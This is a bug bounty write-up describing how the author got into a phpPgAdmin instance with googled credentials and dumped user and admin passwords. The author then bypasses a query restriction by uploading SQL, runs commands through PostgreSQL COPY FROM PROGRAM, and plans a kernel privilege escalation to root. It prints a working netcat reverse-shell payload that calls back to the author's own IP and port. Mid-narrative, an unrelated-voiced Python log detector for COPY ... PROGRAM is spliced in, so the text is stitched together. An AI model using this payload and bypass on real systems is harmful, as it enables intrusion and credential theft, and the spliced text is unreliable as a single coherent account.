Bug Bounty: “My Remote Code Execution”

First Step:

First, I found my subdomain using the Amass tool.

Then I used the ffuf tool to brute-force directories, and I found an improper access control: https://subdomain.xxx.com/phppgadmin

There was a login page that required credentials, a username and a password.

I tried some username/password combinations found by googling, and thanks to Google I found the right one. And you know what? I was IN.

This was my reaction!

Access Database:

Now I had FULL access to their database; I got every username and password, the admin password and the other users' passwords. That was awesome.

But I never tried to crack any of the passwords. Instead, I tried to get a reverse shell.

SQL Injection:

At this point I had the phpPgAdmin GUI, and I could execute SQL queries.

But wait... no, I couldn't! The query statement form blocked my injection, and the query could only be executed from localhost.

SQL Injection blocked!

SQL Injection Bypass:

At this point, after many hours, I noticed that I could bypass the query statement restriction simply by uploading the query via the upload button, and you know what? The query was executed correctly!!

Successful SQL statement bypass.

You can find this exploit on Exploit-DB under my name: https://www.exploit-db.com/exploits/49736 .

This is the result:

RCE

RCE done!

Remote Code Execution:

OK, now that the RCE was DONE, I was trying to get an interactive shell (iShell) or a reverse shell. So I used my RCE to check whether NC (netcat) was installed on their machine, with the command "which nc", and the output was /usr/bin/nc.

Second reaction!

At this point I just changed the payload to use my IP and PORT; my payload was: COPY cmd_exec FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [$MyIp] [$MyPort]>/tmp/f';
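The COPY ... FROM PROGRAM statement above is what a database-side detection should key on, whether it arrives through the phpPgAdmin query form or the upload button, since either way it reaches the PostgreSQL server log. The following detector is an added example, not code from the write-up or from phpPgAdmin: it assumes log_statement = 'all' and a log_line_prefix of the form "%m [%p] %u@%d " (both assumptions), joins multi-line statements back together, and flags every COPY that runs a server-side program (FROM PROGRAM or TO PROGRAM) while leaving ordinary file-based COPY alone.

```python
import re

# Constructed sample PostgreSQL log lines (not from the write-up). Statement 4 is split
# over two lines the way the server logs a multi-line query: only the first line carries
# the log prefix, the continuation line does not.
SAMPLE_LOG = """\
2021-04-01 10:00:01 UTC [1234] postgres@postgres LOG:  statement: SELECT version();
2021-04-01 10:00:05 UTC [1234] postgres@postgres LOG:  statement: CREATE TABLE cmd_exec(cmd_output text);
2021-04-01 10:00:06 UTC [1234] postgres@postgres LOG:  statement: COPY cmd_exec FROM PROGRAM 'id';
2021-04-01 10:00:07 UTC [1234] postgres@postgres LOG:  statement: copy   cmd_exec   from
program 'uname -a';
2021-04-01 10:00:09 UTC [1235] app@appdb LOG:  statement: COPY users FROM '/tmp/users.csv' CSV;
2021-04-01 10:00:10 UTC [1235] app@appdb LOG:  statement: COPY (SELECT 1) TO PROGRAM 'cat';
"""

# Start of a log entry under the assumed prefix: timestamp, [pid], user@db, then the statement.
ENTRY_RE = re.compile(
    r"^\d{4}-\d{2}-\d{2} [\d:]+ \w+ \[(\d+)\] (\S+@\S+) LOG:\s+statement: (.*)$"
)
# COPY ... FROM PROGRAM / TO PROGRAM: case-insensitive, tolerant of extra whitespace
# and of a newline between FROM/TO and PROGRAM; captures the quoted command.
PROGRAM_COPY_RE = re.compile(r"\bCOPY\b.*?\b(FROM|TO)\s+PROGRAM\s+'([^']*)'", re.I | re.S)


def parse_entries(log_text):
    """Group raw log lines into (pid, user@db, full statement) tuples."""
    entries = []
    for line in log_text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append([m.group(1), m.group(2), m.group(3)])
        elif entries:  # no prefix: continuation of the previous statement
            entries[-1][2] += "\n" + line
    return [tuple(e) for e in entries]


def find_program_copies(log_text):
    """Return every COPY statement that executes a program on the database host."""
    hits = []
    for pid, who, stmt in parse_entries(log_text):
        m = PROGRAM_COPY_RE.search(stmt)
        if m:
            hits.append({"pid": pid, "who": who,
                         "direction": m.group(1).upper(), "program": m.group(2)})
    return hits


if __name__ == "__main__":
    for h in find_program_copies(SAMPLE_LOG):
        print(f"pid {h['pid']} {h['who']}: COPY {h['direction']} PROGRAM -> {h['program']!r}")
```

Only superusers and members of the built-in pg_execute_server_program role can run this form of COPY, so a hit from an account that is not supposed to hold either is the alert; the plain file-based COPY in the sample is deliberately not flagged.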

And I WAS IN! Got localhost! But I was the default user "postgres".

I noticed with "uname -a" that the kernel was vulnerable to a local privilege escalation exploit.

And I noticed I could escape from postgres because it runs as root.

So I could get root!

Thanks guys! Follow me on Twitter: @0xJin

In the end, this was reported:

Resolved!
Buy me a coffee if you like it :)

| eCPTX | C|EH Master | CompTIA Security + | eJPT |